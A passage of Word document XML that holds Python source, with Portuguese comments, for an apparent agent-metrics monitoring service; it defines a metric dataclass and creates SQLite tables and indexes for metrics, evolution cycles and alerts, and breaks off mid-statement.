    <w:p w14:paraId="0B5FBF73" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734052B3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B19883" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import statistics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09349A42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="420E8016" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import websockets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4154A8FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from datetime import datetime, timedelta</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3689E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from typing import Dict, Any, List, Optional, Set</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A316186" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from dataclasses import dataclass, asdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73770946" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from collections import defaultdict, deque</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38ABBA17" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0EE158" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import csv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E7B067" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import io</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B674B8B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C9CB17" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import matplotlib.pyplot as plt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C812904" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import matplotlib.dates as mdates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F5B5D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import numpy as np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5230E19D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from flask import Flask, jsonify, request, send_file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384C345A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>from flask_socketio import SocketIO, emit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E81453F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A78F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import psutil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640ECDCE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FA3546" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="67DA854F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>logger = logging.getLogger(__name__)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45392175" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="3BC565B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="1EDBD9A6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>@dataclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733989AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class RealTimeMetric:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0163798F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Métrica em tempo real com validação científica"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603B0FFB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    agent_id: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E0F064" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    metric_name: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54731A52" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    value: float</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5AE81" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    timestamp: datetime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C46839" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    unit: str</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DF38FB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    confidence_level: float = 0.95</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3399F310" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    statistical_significance: bool = True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="340E8CA6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    p_value: Optional[float] = None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D367BFF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    sample_size: int = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FA840" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B266516" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def to_dict(self) -&gt; Dict[str, Any]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B00BB8E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46282A20" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "agent_id": self.agent_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE4EAEA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "metric_name": self.metric_name,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2214CBF5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "value": self.value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E12B48" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "timestamp": self.timestamp.isoformat(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63462240" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "unit": self.unit,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149CDAD4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "confidence_level": self.confidence_level,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6083A7DE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "statistical_significance": self.statistical_significance,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CBD9F9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "p_value": self.p_value,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6875F5A1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            "sample_size": self.sample_size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D08F8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2DBFA6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="621E2DED" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF"/>
    <w:p w14:paraId="3AD4C925" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t>class MetricsDatabase:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10356770" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    """Banco de dados para armazenamento de métricas históricas"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCDE2BD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54806F8F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def __init__(self, db_path: str = "suna_metrics.db"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E44A760" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.db_path = db_path</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD5F355" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        self.init_database()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE4B51B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D04B39B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">    def init_database(self):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386B499B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """Inicializa o banco de dados"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F38260" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn = sqlite3.connect(self.db_path)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DD3FCB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor = conn.cursor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30E51AF3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6047ABB3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Tabela de métricas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3892E08C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BD31A0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            CREATE TABLE IF NOT EXISTS metrics (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7625AE00" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E911EFA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_id TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405E22BB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                metric_name TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76672577" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                value REAL NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1535A5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                timestamp DATETIME NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB7FF0A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                unit TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C00577" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                confidence_level REAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689E701C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                statistical_significance BOOLEAN,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213FBFC2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                p_value REAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC4A4C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                sample_size INTEGER,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAB10C3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                created_at DATETIME DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AEE9CD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4C1298" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2472491B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6B5C43" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Tabela de ciclos de evolução</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BF4CCE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F26C35" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            CREATE TABLE IF NOT EXISTS evolution_cycles (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042DD9EA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0DA35F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_id TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C416AA6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                cycle_number INTEGER NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A534F4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                cycle_type TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED3588" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                start_time DATETIME NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B616C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                end_time DATETIME,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66453CDB" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                duration_ms REAL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093C887C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                improvements_count INTEGER DEFAULT 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="724CB83D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                performance_delta REAL DEFAULT 0.0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444E909" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                success BOOLEAN DEFAULT TRUE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62ACAEE5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BE82FA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                created_at DATETIME DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48B366FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258304A1" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E554C9C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1968D863" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Tabela de alertas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66420E07" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F210800" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            CREATE TABLE IF NOT EXISTS alerts (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013C993B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCF2CE0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                alert_type TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F948F3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                severity TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30703A67" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                agent_id TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7D5261" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                message TEXT NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECE3AFA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                details TEXT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58B961FC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                triggered_at DATETIME NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF0E03B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                resolved_at DATETIME,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D70F8C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                is_resolved BOOLEAN DEFAULT FALSE,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C5F14" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">                created_at DATETIME DEFAULT CURRENT_TIMESTAMP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C584759" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">            )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B60D4F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10293970" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188D37D6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        # Índices para performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CA3BE6B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("CREATE INDEX IF NOT EXISTS idx_metrics_agent_time ON metrics(agent_id, timestamp)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CCF91F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("CREATE INDEX IF NOT EXISTS idx_cycles_agent ON evolution_cycles(agent_id)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427DE39E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        cursor.execute("CREATE INDEX IF NOT EXISTS idx_alerts_time ON alerts(triggered_at)")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291F791" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D36757" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.commit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D306394" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        conn.close()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6468D89D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254AF38D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:r>
        <w:t xml:space="preserve">        logger.info("</w:t>
      </w:r>
      <w:r>
